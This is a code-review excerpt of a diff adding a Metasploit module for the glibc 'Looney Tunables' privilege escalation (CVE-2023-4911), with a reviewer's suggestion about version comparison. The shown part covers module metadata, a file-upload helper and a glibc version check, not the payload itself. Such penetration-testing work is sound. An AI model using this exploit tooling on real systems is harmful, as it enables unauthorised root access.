modules/exploits/linux/local/glibc_tunables_priv_esc.rb

```diff
@@ -0,0 +1,129 @@
+  # includes writable?, upload_file, upload_and_chmodx, exploit_data
+  include Msf::Post::File
+  # includes register_files_for_cleanup
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)',
+        'Description' => %q{
+          A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES
+          environment variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when
+          launching binaries with SUID permission to execute code in the context of the root user.
+        },
+        'Author' => [
+          'Qualys Threat Research Unit', # discovery
+          'blasty', # PoC
+          'jheysel-r7' # msf module
+        ],
+        'References' => [
+          [ 'CVE', '2023-4911'],
+          [ 'URL', 'https://haxx.in/files/gnu-acme.py'],
+          [ 'URL', 'https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt'],
+          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2023-4911'],
+          ['URL', 'https://ubuntu.com/security/CVE-2023-4911']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => [ 'linux', 'unix' ],
+        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_AARCH64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PrependSetresgid' => true,
+          'PrependSetresuid' => true,
+          'WfsDelay' => 600
+        },
+        'DisclosureDate' => '2023-10-03',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_advanced_options([
+      OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
+    ])
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    write_file path, data
+  ensure
+    register_file_for_cleanup(path)
+  end
+
+  def find_exec_program
+    %w[python python3].select(&method(:command_exists?)).first
+  end
+
+  def check
+    glibc_version = cmd_exec('ldd --version').scan(/ldd\s+\(\w+\s+GLIBC\s+(\S+)\)/)&.flatten&.first
+    return CheckCode::Unknown('Could not get the version of glibc') unless glibc_version
+
+    sysinfo = get_sysinfo
+    case sysinfo[:distro]
+    when 'ubuntu'
+      if (Rex::Version.new('2.35-0ubuntu3.4') > Rex::Version.new(glibc_version) && Rex::Version.new('2.35') > Rex::Version.new(glibc_version)) ||
+         (Rex::Version.new('2.37-0ubuntu2.1') > Rex::Version.new(glibc_version) && Rex::Version.new('2.37') > Rex::Version.new(glibc_version)) ||
```

Comment:
There is the handy `between` method, that one can use like this: `Rex::Version.new(glibc_version).between?(Rex::Version.new('1.2'), Rex::Version.new('1.9'))`